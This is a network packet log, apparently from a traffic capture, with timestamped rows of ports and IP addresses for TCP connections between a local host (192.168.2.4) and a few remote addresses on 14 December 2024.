Dec 14, 2024 12:56:31.902489901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.902545929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.904247046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.904517889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.904581070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.904594898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.904629946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.909389973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.909537077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.914339066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.914505959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.919364929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.919774055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.922354937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.924777985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.924866915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.929301977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.929341078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.931783915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.934062004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.934129953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.934134007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.934190035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.938828945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.938885927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.941327095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.943820000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.943859100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.948514938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.948587894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.949433088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.953571081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.953679085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.954174995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.958245039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.958285093 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.958303928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.958339930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.963057995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.963196039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.964061975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.967932940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.967968941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.968862057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.972767115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.972856045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.973702908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.977449894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.977580070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.982271910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.982414961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.985814095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.987103939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.987169027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.987236977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.987298012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.991942883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.992110968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.992115974 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.992187977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.024626970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.024679899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.024688005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.024724007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.026875019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.026923895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.087629080 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.087703943 CET	443	49835	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:32.087809086 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.089273930 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.089306116 CET	443	49835	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:32.094024897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.094083071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.094383955 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.094448090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.096252918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.096342087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.097260952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.100136042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.100193977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.100264072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.100370884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.104304075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.104367971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.104479074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.104526997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.108325005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.108380079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.108431101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.108480930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.112345934 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.112397909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.112437010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.112485886 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.116413116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.116482019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.116575956 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.116622925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.120065928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.120122910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.120126963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.120289087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.123538017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.123593092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.123683929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.127017975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.127152920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.127154112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.127257109 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.130563021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.130669117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.130687952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.130748987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.134156942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.134205103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.134243965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.134284973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.137671947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.137783051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.138423920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.141222954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.141272068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.141364098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.141401052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.144742966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.144805908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.144819021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.144879103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.148303986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.148425102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.148461103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.148488998 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.151843071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.151896954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.151968002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.152363062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.154031992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.154176950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.154208899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.154232025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.156111002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.156200886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.157727957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.158250093 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.158305883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.158418894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.158468008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.160387039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.160445929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.160525084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.160574913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.162592888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.162646055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.162668943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.162719965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.164865017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.164923906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.165011883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.165062904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.166883945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.166937113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.166984081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.167032957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.168967009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.169020891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.169048071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.169095993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.171062946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.171111107 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.171175003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.171361923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.229666948 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.229688883 CET	443	49836	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:32.237278938 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.240111113 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:32.240123987 CET	443	49836	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:32.286133051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.286247969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.286288977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.286375999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.287220001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.287286043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.287398100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.287470102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.289326906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.289386034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.289423943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.289486885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.291446924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.291527987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.291599035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.291683912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.293488026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.293605089 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.295557022 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.295691013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.296456099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.297538996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.297593117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.298835039 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.299491882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.299551964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.299623013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.299680948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.301351070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.301532030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.303309917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.303390026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.303422928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.305224895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.305298090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.307445049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.307573080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.307740927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.309067965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.309322119 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.310380936 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.311023951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.311134100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.313019991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.313086033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.314898968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.315053940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.316842079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.316948891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.318876028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.318985939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.320184946 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.320770979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.320935965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.321816921 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.322690010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.322742939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.322885036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.322885036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.324666023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.324740887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.324815989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.324875116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.326679945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.326745033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.326781034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.326841116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.328660965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.328716993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.328727007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.328771114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.330522060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.330600977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.330646038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.330709934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.332418919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.332477093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.332645893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.332706928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.334398031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.334455013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.334573030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.334634066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.336368084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.336500883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.337553024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.338239908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.338371992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.339248896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.340198040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.340332985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.342200994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.342359066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.344085932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.344170094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.345263958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.345299959 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.345540047 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.346019983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.346158028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.346410036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.347989082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.348042011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.349872112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.350023985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.351921082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.352066040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.353770971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.354034901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.354633093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.355786085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.355890036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.357713938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.357855082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.359636068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.359729052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.361566067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.361707926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.363481045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.367217064 CET	49837	80	192.168.2.4	34.107.221.82
Dec 14, 2024 12:56:32.369601965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.369793892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.478357077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.478544950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.478576899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.478674889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.479281902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.479347944 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.479383945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.479444027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.481051922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.481089115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.481117964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.481151104 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.482868910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.482923985 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.482999086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.483572006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.484743118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.484869003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.485340118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.486471891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.486581087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.486589909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.486660957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.486944914 CET	80	49837	34.107.221.82	192.168.2.4
Dec 14, 2024 12:56:32.487880945 CET	49837	80	192.168.2.4	34.107.221.82
Dec 14, 2024 12:56:32.488033056 CET	49837	80	192.168.2.4	34.107.221.82
Dec 14, 2024 12:56:32.488282919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.488348007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.488389015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.488446951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.490053892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.490128040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.490200996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.490262032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.491878033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.491940022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.491964102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.492022038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.493674040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.493798971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.493810892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.493865013 CET	49827	80	192.168.2.4	185.215.113.16
